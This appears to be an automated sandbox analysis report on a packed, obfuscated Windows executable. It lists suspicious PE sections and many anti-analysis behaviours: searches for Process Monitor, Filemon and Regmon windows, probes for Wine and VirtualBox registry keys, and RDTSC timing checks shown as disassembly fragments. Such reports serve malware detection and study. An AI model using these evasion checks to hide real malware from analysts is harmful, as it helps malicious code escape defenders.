Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll (7 further loads)
Source: file.exe | Static file information: File size 2972160 > 1048576
Source: file.exe | Static PE information: Raw size of tenlogwb is bigger than: 0x100000 < 0x2aa400

              Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.3d0000.0.unpack; section rights in memory: (empty name):EW; .rsrc:W; .idata:W; tenlogwb:EW; zqaausgd:EW; .taggant:EW vs. on disk: (empty name):ER; .rsrc:W; .idata:W; tenlogwb:EW; zqaausgd:EW; .taggant:EW (the unnamed first section is execute/read on disk but execute/write once unpacked)
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: checksum in header: 0x2dc2a9, computed from file: 0x2e21c3
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: tenlogwb
Source: file.exe | Static PE information: section name: zqaausgd
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_00E5B2BD push esi; retf (0_3_00E5B2C0) (4 entries)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_00E5AE3F push FFFFFFDBh; iretd (0_3_00E5AE50) (4 entries)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_00E2B54F push ds; retf (0_3_00E2B550)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_00E606D9 push eax; ret (0_3_00E60849) (3 entries)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_00E607A4 push eax; ret (0_3_00E60849) (3 entries)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_05584237 push cs; iretd (0_3_05584238) (4 entries)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_055891A6 push eax; ret (0_3_055891E1) (4 entries)
Source: file.exe | Static PE information: section name: (empty) entropy: 7.968774204528531

              Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass (2 entries)
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS (3 entries)
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass (2 entries)
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\file.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 42F328 second address: 42F335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F02B8F275E6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 42F335 second address: 42F35A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F02B8F2D499h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 42F35A second address: 42F364 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F02B8F275E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 42F364 second address: 42F381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02B8F2D499h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 42F381 second address: 42F385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 42F385 second address: 42EBEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 cld 0x0000000a push dword ptr [ebp+122D0C69h] 0x00000010 mov dword ptr [ebp+122D1D2Fh], eax 0x00000016 call dword ptr [ebp+122D2ABDh] 0x0000001c pushad 0x0000001d mov dword ptr [ebp+122D2C9Bh], ecx 0x00000023 xor eax, eax 0x00000025 mov dword ptr [ebp+122D2C9Bh], edx 0x0000002b mov edx, dword ptr [esp+28h] 0x0000002f sub dword ptr [ebp+122D2C9Bh], ecx 0x00000035 mov dword ptr [ebp+122D3AC3h], eax 0x0000003b mov dword ptr [ebp+122D2C9Bh], eax 0x00000041 mov esi, 0000003Ch 0x00000046 xor dword ptr [ebp+122D2C9Bh], ecx 0x0000004c add esi, dword ptr [esp+24h] 0x00000050 pushad 0x00000051 mov edx, dword ptr [ebp+122D3967h] 0x00000057 jmp 00007F02B8F2D490h 0x0000005c popad 0x0000005d lodsw 0x0000005f sub dword ptr [ebp+122D2C9Bh], esi 0x00000065 stc 0x00000066 add eax, dword ptr [esp+24h] 0x0000006a pushad 0x0000006b pushad 0x0000006c mov edi, edx 0x0000006e sub dword ptr [ebp+122D2C9Bh], eax 0x00000074 popad 0x00000075 mov di, bx 0x00000078 popad 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d jc 00007F02B8F2D487h 0x00000083 stc 0x00000084 mov dword ptr [ebp+122D2C9Bh], ebx 0x0000008a push eax 0x0000008b pushad 0x0000008c push esi 0x0000008d push eax 0x0000008e push edx 0x0000008f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 42EBEC second address: 42EC06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F02B8F275F3h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 42EC06 second address: 42EC0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AC2CD second address: 5AC306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F275F0h 0x00000007 jns 00007F02B8F275EAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 jnp 00007F02B8F275F2h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AC306 second address: 5AC31D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D493h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AB311 second address: 5AB31B instructions: 0x00000000 rdtsc 0x00000002 je 00007F02B8F275E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AB46E second address: 5AB48C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jno 00007F02B8F2D486h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 pop eax 0x00000013 jo 00007F02B8F2D486h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AB48C second address: 5AB490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AB5D4 second address: 5AB5DE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F02B8F2D486h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AB5DE second address: 5AB5E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | R DTSC instruction interceptor: First address: 5AB5E6 second address: 5AB5EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AB790 second address: 5AB7DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F02B8F275F9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jne 00007F02B8F275E6h 0x00000012 jmp 00007F02B8F275F0h 0x00000017 pop edi 0x00000018 pushad 0x00000019 jmp 00007F02B8F275F3h 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AF8D2 second address: 5AF8FC instructions: 0x00000000 rdtsc 0x00000002 je 00007F02B8F2D496h 0x00000008 jmp 00007F02B8F2D490h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 je 00007F02B8F2D486h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AFBFC second address: 5AFC1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02B8F275F8h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CF209 second address: 5CF221 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02B8F2D494h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A3918 second address: 5A392C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F02B8F275ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A392C second address: 5A3930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CCF70 second address: 5CCF94 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F02B8F275E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b pushad 0x0000000c jmp 00007F02B8F275F0h 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007F02B8F275E6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CD270 second address: 5CD27F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F02B8F2D486h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CD27F second address: 5CD283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CD283 second address: 5CD287 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CD287 second address: 5CD2A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02B8F275EEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CD3EB second address: 5CD3F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CD3F5 second address: 5CD3F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CDB32 second address: 5CDB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02B8F2D48Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CDB40 second address: 5CDB4E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F02B8F275E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CDB4E second address: 5CDB52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CDB52 second address: 5CDB6E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F02B8F275F1h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CDB6E second address: 5CDB74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CDB74 second address: 5CDB8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 jmp 00007F02B8F275ECh 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CE034 second address: 5CE040 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 je 00007F02B8F2D486h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CE040 second address: 5CE07A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F02B8F275E6h 0x0000000b pop edx 0x0000000c push ebx 0x0000000d jmp 00007F02B8F275EBh 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 jo 00007F02B8F275E6h 0x0000001d jmp 00007F02B8F275ECh 0x00000022 jno 00007F02B8F275E6h 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CE07A second address: 5CE07E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CE07E second address: 5CE087 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CE992 second address: 5CE996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CE996 second address: 5CE99C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CE99C second address: 5CE9E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F02B8F2D497h 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F02B8F2D48Ch 0x00000014 jnl 00007F02B8F2D49Ch 0x0000001a jmp 00007F02B8F2D496h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CED92 second address: 5CED98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CED98 second address: 5CEDA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CF05D second address: 5CF063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CF063 second address: 5CF067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5CF067 second address: 5CF06B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D39EB second address: 5D39EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D3DC8 second address: 5D3DD2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F02B8F275ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DB2B0 second address: 5DB2BA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F02B8F2D48Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DB2BA second address: 5DB2C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jng 00007F02B8F275E6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DA78F second address: 5DA7A0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F02B8F2D48Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DAF89 second address: 5DAF8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DAF8D second address: 5DAFBB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F02B8F2D486h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F02B8F2D48Bh 0x00000010 jmp 00007F02B8F2D497h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DBAC4 second address: 5DBAE9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F02B8F275FAh 0x00000011 jmp 00007F02B8F275F4h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DBAE9 second address: 5DBB0B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jnc 00007F02B8F2D48Ah 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007F02B8F2D488h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DBB0B second address: 5DBB20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02B8F275F1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DBB20 second address: 5DBB4B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push edi 0x0000000d push ecx 0x0000000e jnp 00007F02B8F2D486h 0x00000014 pop ecx 0x00000015 pop edi 0x00000016 pop eax 0x00000017 mov esi, dword ptr [ebp+122D1E35h] 0x0000001d push 94D77034h 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 jns 00007F02B8F2D486h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DBB4B second address: 5DBB66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F275F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DBB66 second address: 5DBB6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DBFA8 second address: 5DBFBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DBFBA second address: 5DBFBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DC7B5 second address: 5DC7CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F02B8F275EEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DC7CB second address: 5DC7CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DC7CF second address: 5DC7EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F02B8F275EDh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DC87B second address: 5DC87F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DC87F second address: 5DC885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DC885 second address: 5DC88A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DCED5 second address: 5DCED9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DCED9 second address: 5DCEE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DCEE3 second address: 5DCEE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DCEE7 second address: 5DCF07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F02B8F2D491h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DE356 second address: 5DE369 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F02B8F275EDh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DE369 second address: 5DE379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F02B8F2D486h 0x0000000a jnp 00007F02B8F2D486h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DEA85 second address: 5DEA8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DEA8B second address: 5DEAF1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F02B8F2D486h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jne 00007F02B8F2D49Dh 0x00000013 nop 0x00000014 or dword ptr [ebp+122D235Dh], eax 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D2298h], esi 0x00000022 push 00000000h 0x00000024 movsx edi, ax 0x00000027 jnc 00007F02B8F2D489h 0x0000002d xchg eax, ebx 0x0000002e jmp 00007F02B8F2D494h 0x00000033 push eax 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 jnl 00007F02B8F2D486h 0x0000003d rdtsc
